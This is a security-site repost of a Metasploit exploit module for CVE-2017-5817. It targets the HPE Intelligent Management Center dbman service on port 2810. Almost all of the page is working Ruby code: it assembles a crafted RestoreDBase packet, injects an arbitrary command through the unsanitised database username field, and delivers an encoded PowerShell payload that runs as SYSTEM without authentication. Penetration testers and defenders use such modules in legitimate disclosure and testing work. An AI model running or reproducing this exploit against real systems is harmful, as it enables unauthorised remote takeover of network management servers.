首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HPE iMC dbman RestoreDBase Unauthenticated Remote Command Execution
来源:metasploit.com 作者:Coles 发布时间:2018-01-10  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPE iMC dbman RestoreDBase Unauthenticated RCE',
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in
        Hewlett Packard Enterprise Intelligent Management Center before
        version 7.3 E0504P04.

        The dbman service allows unauthenticated remote users to restore
        a user-specified database (OpCode 10007), however the database
        connection username is not sanitized resulting in command injection,
        allowing execution of arbitrary operating system commands as SYSTEM.
        This service listens on TCP port 2810 by default.

        This module has been tested successfully on iMC PLAT v7.2 (E0403)
        on Windows 7 SP1 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sztivi', # Discovery
          'Chris Lyne', # Python PoC (@lynerc)
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-5817'],
          ['EDB', '43195'],
          ['ZDI', '17-341'],
          ['URL', 'https://www.securityfocus.com/bid/98469/info'],
          ['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
        ],
      'Platform'       => 'win',
      'Targets'        => [['Automatic', {}]],
      'Payload'        => { 'BadChars' => "\x00" },
      'DefaultOptions' => { 'WfsDelay' => 15 },
      'Privileged'     => true,
      'DisclosureDate' => 'May 15 2017',
      'DefaultTarget'  => 0))
    register_options [Opt::RPORT(2810)]
  end

  def check
    # empty RestoreDBase packet
    pkt = [10007].pack('N')

    connect
    sock.put pkt
    res = sock.get_once
    disconnect

    # Expected reply:
    # "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
    return CheckCode::Detected if res =~ /dbman/i

    CheckCode::Safe
  end

  def dbman_msg(database_user)
    data = ''

    db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
    database_type = "\x03" # MySQL
    restore_type = 'MANUAL'
    database_password = rand_text_alpha rand(1..5)
    database_port = rand_text_alpha rand(1..5)
    database_instance = rand_text_alpha rand(1..5)
    junk = rand_text_alpha rand(1..5)

    # database ip
    data << "\x04"
    data << [db_ip.length].pack('C')
    data << db_ip

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # junk
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x02\x01\x01"

    # database type
    data << "\x02"
    data << [database_type.length].pack('C')
    data << database_type

    # restore type
    data << "\x04"
    data << [restore_type.length].pack('C')
    data << restore_type

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # database user
    data << "\x04"
    data << "\x82"
    data << [database_user.length].pack('n')
    data << database_user

    # database password
    data << "\x04"
    data << [database_password.length].pack('C')
    data << database_password

    # database port
    data << "\x04"
    data << [database_port.length].pack('C')
    data << database_port

    # database instance
    data << "\x04"
    data << [database_instance.length].pack('C')
    data << database_instance

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk

    # ???
    data << "\x30\x00"
    data << "\x02\x01\x01"

    data
  end

  def dbman_restoredbase_pkt(database_user)
    data = dbman_msg database_user

    # opcode 10007 (RestoreDBase)
    pkt = [10007].pack('N')

    # packet length
    pkt << "\x00\x00"
    pkt << [data.length + 4].pack('n')

    # packet data length
    pkt << "\x30\x82"
    pkt << [data.length].pack('n')

    # packet data
    pkt << data

    pkt
  end

  def execute_command(cmd, _opts = {})
    connect
    sock.put dbman_restoredbase_pkt "\"& #{cmd} &"
    disconnect
  end

  def exploit
    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { :remove_comspec => true, :encode_final_payload => true }
    )

    if command.length > 8000
      fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
    end

    print_status "Sending payload (#{command.length} bytes)..."
    execute_command command
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HPE iMC dbman RestartDB Unauth
·DiskBoss Enterprise 8.8.16 - B
·Synology Photostation 6.7.2-34
·Microsoft Edge Chakra JIT - 'L
·Commvault Communications Servi
·Jungo Windriver 12.5.1 - Privi
·Microsoft Windows - 'nt!NtQuer
·Polygonize PC 1.1 Remote Comma
·Microsoft Windows - 'nt!NtQuer
·TP-Link Remote Command Injecti
·Microsoft Edge Chakra JIT - Es
·phpCollab 2.5.1 Unauthenticate
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved